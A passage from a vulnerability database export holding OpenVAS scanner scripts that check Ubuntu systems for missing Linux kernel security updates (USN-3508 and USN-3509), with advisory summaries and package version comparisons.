(CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1023-raspi2\", ver:\"4.10.0-1023.26\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1023.24\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843396", "type": "openvas", "title": "Ubuntu Update for linux-hwe USN-3508-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3508-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843396\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:42 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3508-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3508-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. 
(CVE-2017-1000405) Yonggang Guo discovered that a\n race condition existed in the driver subsystem in the Linux kernel. A local\n attacker could use this to possibly gain administrative privileges.\n (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843403", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843403", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3509-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_4.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3509-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843403\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:42 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3509-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-2 fixed vulnerabilities in the\n Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also\n introduced a regression that prevented the Ceph network filesystem from being\n used. This update fixes the problem. We apologize for the inconvenience.\n Original advisory details: Mohamed Ghannam discovered that a use-after-free\n vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A\n local attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code. (CVE-2017-16939) It was discovered that the\n Linux kernel did not properly handle copy-on- write of transparent huge pages. 
A\n local attacker could use this to cause a denial of service (application crashes)\n or possibly gain administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran\n Qiu, and Shixiong Zhao discovered that the associative array implementation in\n the Linux kernel sometimes did not properly handle adding a new entry. A local\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-12193) Andrey Konovalov discovered an out-of-bounds read in the GTCO\n digitizer USB driver for the Linux kernel. A physically proximate attacker could\n use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1006-aws\", ver:\"4.4.0-1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", 
ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.104.87\", 
rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843398", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843398\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:55 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong Zhao discovered that the\n associative array implementation in the Linux kernel sometimes did not properly\n handle adding a new entry. 
A local attacker could use this to cause a denial of\n service (system crash). (CVE-2017-12193) Andrey Konovalov discovered an\n out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A\n physically proximate attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1012-kvm\", ver:\"4.4.0-1012.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", 
ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1043-aws\", ver:\"4.4.0-1043.52\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1079-raspi2\", ver:\"4.4.0-1079.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1081-snapdragon\", ver:\"4.4.0-1081.86\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1043.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1012.12\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1079.79\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1081.73\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843402", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or 
modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843402\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:32 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. Unfortunately, it also introduced a\n regression that prevented the Ceph network filesystem from being used. This\n update fixes the problem. We apologize for the inconvenience. 
Original advisory\n details: Mohamed Ghannam discovered that a use-after-free vulnerability existed\n in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use\n this to cause a denial of service (system crash) or possibly execute arbitrary\n code. (CVE-2017-16939) It was discovered that the Linux kernel did not properly\n handle copy-on- write of transparent huge pages. A local attacker could use this\n to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1013-kvm\", 
